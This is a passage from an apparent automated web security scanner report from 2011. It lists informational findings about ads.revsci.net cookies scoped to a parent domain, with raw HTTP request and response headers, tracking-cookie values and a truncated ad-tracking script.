Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sZLs="MLtXrl8utl9nIAH3UpzIJlAWnrFYGbJvOWDi153GQb2cZxqKMlwiAWoJ5Yu9t3o3RMAlOi1iudA1qvDChUqCLpGZorRdTiZLCmu4FMR9FpglQcv0Y1wqRDvlSp+dnJtWb4pctVLY2kxSXEJ6h1S7KFlnlFhQJIHSkSQTXVd1wA8DYdU/cG7AYCLy9/dLqfyLTnaeh3NmViaoJIybWwWmlkBFss+7oIy0C5/dZoP1eijxhsUGplHBN8ZOLDaEyRA+gCdTCOCL7EINN3DAxLHHSdt5dg/i/I7/F0rRXTyOJHnaBHf4RLX0Ihr8i1qNqEYac/8uPOw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJUmnOAIY1E3idJy9P5xdUThji6cmbl0yfrhTyjCHf+MXlD8u4Dpf0WbV2MEF4Ptn0dsRzdffVzzETU6of4++pRgG2lag8DAoBv+l8YX3XQilsoyx7SnlEa1UehCDSGPUAHRbRDKvVP/l/NBkphKHgqatoW/Es9C2bEYOGxQ6RvrAyMCPlU9k1r+UuUMGubwwSXadyFNsWz+pv9wP3+szYzHM/A6vuE9KM/dePOyZlGgOlHPM/Y1IroFxhTfC6Q0+caxpQOG3dMXFWOHaPUm0okqLCNdwRhj081y78hsDctJhbBbdjv0IH6XxpivjJzcqDOtU4RuYeNP1Pz4yoUBTyqC9oAgdx8pehpVaBQbthOnFXxGUF/yB7ikUu5ig61qgiVju/F6i1wpuqcbpdkyu4zpoZfan2fKXvSxwIPCd+mIom4eL/OTKSYUZ5vT2qDtgmoBcX1PIYlyvh6YjUI54PESg7XeADVSQUOxaVQMVoAeDTFYHzCYasCZb+1pRoCX2K+Vbfr83amcfki1jFlliD3wyx5nLpqeMw1sSkZwlsTlpKpI+hJ/sKTcBHI9v2liDRop3P1uZtc5BlUq2bSJ+pzj7kN/wrp0KJHRSqjzTf2hce3dr2DJVRcTEnEXV5husthlq2otZkyp3u1wjVrx0GbekwL2d+EQ1riWcQWpLYgE3QnvmYOUVrA8XdbCp4W+U2fAmiMd2YnNuAwle3NbdgdX8yQmLeU9l3kt7wJ17XlJ+6U4ImPBB/NejbV9+C/J6JU4GbesxHh31tI/cjoeeMt31mqERU+o1Balsy2vsGMMDZSAMm9gpSpVq6shvegudvENtBc/qTVoaw//HCrACTV2CI0m91tSZBai9tiNOvtzyNtrxKV63QHO2CtrOMHBzvh4bf14="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:22 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.8. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-="MLtXrl8utl9nIAH3UpyYS5hfBI/9QmnaLO8+oQBTcj1w7zk1SBcuEp11OYV3eoEYGjpFZWOPgoNQci70eKD5Ye/TluCH1ph2OfNJJMjXr2tEwK6lT90zRjTWFir3Smdxu7Pzv7IGaJb71qrC4tVI3Snv040D4KfKVeDwv36XXJk56KbIZB9bXWfOPmlpFy/NYxQNhmbXX7VX4OufOCJaGnRnjt7od3EgCE3JFz3vU3k7mw43bPeHKuGhKee7f4PwRlAXPU22nFtYN+Qzfjq1jqlV4IJnvHjWiSaeoFFH8sW+jqA85vTE9ESWiYb8WI1yKhshWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJUmnOAIY1E3idJy9v6s4JGVJ5ObQ+5teuL11ZXhNSsXZ156dYZ/zFzx7/QK2StGwrzmf3c8cmJlrbiousVEvoToDEFJ1YaJsDm6tTMw+CAf64AC6eY9EN7eZdhTC+Ck513ESp294zWo7X0k04/Z7TVzJyAZ/W3jznJIUEqdU1MvgEn3LxKvvcjO0hJ7zokiDJZC1kr7s8qFNMcCFyZMPGAQ21/szK332YYSpqr4wbbKgSf1iqx1DkHEuFxdbdIDuOLV/7HDr0NSI9lfUz1DeVzP0JmoTPtwzgb8RnYjUpP9j7MJuO/1BHimcP7e6eWWC22CTIo5O5ghe229XFc53R3p/6IVPDoJ0f2o2u6pe4sqNRk8f+ktcpgyfjzEvgM+MPva8Ei9Xo9xSqcZpt0yu9Z/iFCoapf4P2ym1XfY/7kJ6+WWK/OTKSYX5lvT0qD1gmoFUuVLwYl2vhq4jUI9wfESh7XeADVSQEPzaVQMVoBmPTFYHzyc6qCrbDTXvN37EmmLnSUn8n8LX6/nkfMoPz08xYhN15l7cEJAO7eWxfAqYCK5bypxxpTHvd+4cQYCnS8hpP9EFHp7nkU4TLIA7QK/PlvTtIyPuP9fr+OoLZRcVteNeKwbfnhmTiCo7n4X2JZMQxdDny4vMVaWpaHblOeXc8jUsd1A0fax/8Cjpuqt+xYazn2DsB1aqMrYPglKJmcXXOzMrNMqOAD6AkPkBINEu3pbtyG0TWrs76ByH904QwXmVXuhHtLigqnqLxpAOGpU61RvW300ARPPLydRznVLLo3zM6+jS3AbPjds3pX2bLumlDwKTASho04dsVjnTmgsFlZH91XIdGf4XMWshXYvVc4vm04tg0PjkA6w/91baJncnmZLxWvccwNe1Re1P4QUSf9U="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:50:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.9. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
